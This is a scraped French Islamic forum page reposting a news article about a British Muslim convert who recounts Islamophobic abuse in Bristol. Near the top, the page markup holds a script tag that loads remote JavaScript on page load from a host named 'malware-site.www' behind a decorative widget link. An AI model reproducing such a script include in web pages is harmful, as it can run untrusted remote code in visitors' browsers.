ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Septembre 2017

LunMarMerJeuVenSamDim
    123
45678910
11121314151617
18192021222324
252627282930 

Calendrier Calendrier


    Une Britannique voilée, convertie à l’islam, témoigne des violences islamophobes

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Une Britannique voilée, convertie à l’islam, témoigne des violences islamophobes

    Message par assalafia le Ven 28 Mar - 10:06

    Surprised
    C’est depuis Bristol, où elle s’est installée avec son époux d’origine algérienne, que cette mère de famille de 36 ans, qui chérit tendrement ses trois jeunes enfants, a choisi de médiatiser le récit de son parcours personnel, après avoir été atterrée par l’insupportable minimisation des crimes de haine par la police du comté.

    Sous son voile de la sérénité recouvrée, elle garde la tête haute, confiante dans sa foi et les valeurs musulmanes qui éclairent son quotidien et chacun de ses pas, en dépit des innombrables brimades et agressions islamophobes qui ont jalonné sa route depuis sa conversion, Kelly Ziane, une britannique, née dans une famille chrétienne, a attendu 18 ans avant de sortir du silence pour témoigner de ce jour béni où elle a embrassé l’islam et des lendemains assombris par le racisme primaire.
    C’est depuis Bristol, où elle s’est installée avec son époux d’origine algérienne, que cette mère de famille de 36 ans, qui chérit tendrement ses trois jeunes enfants, a choisi de médiatiser le récit de son parcours personnel, après avoir été atterrée par l’insupportable minimisation des crimes de haine par la police du comté, en direct à la télévision, niant leur fréquence et leur extrême brutalité notamment envers les musulmanes voilées.
    Des femmes devenues, en l’espace de quelques années, les proies de prédilection des barbares des temps modernes, dont l’infinie lâcheté n’a d’égale que la sauvagerie inouïe, comme l’ont corroboré nombre de rapports édifiants, et particulièrement le premier service musulman d’assistance téléphonique « Tell Mama » qui, en 2013, a révélé des chiffres à faire frémir dans les chaumières. Après douze mois d’une étude approfondie, il est en effet ressorti que la majorité des musulmans qui sont régulièrement intimidés, harcelés ou agressés s’avèrent être des musulmanes dans 60% des cas, la visibilité de leur islamité étant à l’origine de la plupart des passages à l’acte, mais aussi qu’aucun citoyen musulman n’est à l’abri d’un déchaînement de violences islamophobes qui, dans 54% des incidents, graves et moins graves, portent la signature de l’extrême droite britannique.
    Profondément heurtée par ce déni de réalité des forces de l’ordre, Kelly Ziane, n’y tenant plus, a décidé de se remémorer, devant les micros qui se sont aussitôt tendus vers elle, le sentiment de plénitude qui l’a envahie lorsque, à l’aube de ses 18 ans, sa ligne d’horizon s’est illuminée d’une douce clarté, celle d’une proximité apaisée et vivifiante avec le Très-Haut, n’imaginant pas alors que la société extérieure pouvait cacher un monde des ténèbres qui exècre le halo de lumière divine de l’islam.
    "Je me suis convertie à l'Islam il y aura bientôt 19 ans, ce fut un moment intense et certainement l’un des plus beaux de ma vie. J’avais trouvé ma religion et ma voie et j’étais la plus heureuse des femmes, même si mon choix a suscité des réactions très mitigées autour de moi, certains proches ou amis m’ont critiquée sans aucun égard pour ma personne, ni respect envers une décision intime qui m’appartenait à moi et à moi seule. Un seul s’est réjoui pour moi sans me juger", a-t-elle raconté à la presse locale.
    Et de poursuivre, étreinte par l'émotion : "Malheureusement, je n’ai pas assez de doigts sur mes mains pour compter le nombre d’humiliations que j’ai subies depuis, principalement en raison de mon hijab. J’ai été insultée, bousculée et même brutalisée. Des agressions verbales et physiques qui laissent de profondes séquelles."
    Dépassant la peur sclérosante, dénuée de haine envers les criminels qui l’attisent et commettent l’innommable en son nom, Kelly Ziane impressionne par la force qu’elle puise au tréfonds d’elle-même, confortée par sa foi inébranlable, pour affronter ce monde hostile, y vivre et élever ses enfants, même si certaines images cauchemardesques ne cessent de hanter ses nuits. Comment pourrait-elle en effet oublier cet automobiliste qui a soudainement accéléré à sa vue, alors qu’elle était en train de traverser un passage piétons avec ses deux petites filles et son fils, les laissant pétrifiés sur place après les avoir évités de justesse, tout en les traitant de « sales Paki » au passage ?
    Comment pourrait-elle effacer de sa mémoire les affronts répétitifs infligés par des parents d’élèves pleins de morgue à son égard, l’obligeant à changer ses enfants d’école face à l’inertie ou l’indifférence de l’équipe pédagogique, quand ceux-ci, moqués et injuriés, ont été les nouvelles têtes de turc de leurs petits camarades de classe, et pire encore, de certains enseignants ?
    A travers son témoignage personnel, la très lucide Kelly Ziane, qui a parfaitement analysé les causes politico-médiatiques de cette escalade de la haine anti-musulmans, dont on ne sait jusqu’à quelles extrémités elle peut culminer, pleinement consciente de l’impact désastreux du fait divers qui a horrifié le Royaume-Uni et la communauté musulmane au premier chef, le meurtre du soldat Lee Rigby, exhorte ses coreligionnaires à signaler les agressions islamophobes, à les dénoncer, à porter plainte contre leurs auteurs, et ce quel que soit leur niveau de gravité. Il n’y a pas de hiérarchie qui vaille en matière de crimes de haine pour la jeune femme dont la grande dignité, que personne ne réussira à lui voler, irradie sous son voile.
    Par la rédaction d'Oumma.com

      La date/heure actuelle est Ven 22 Sep - 12:56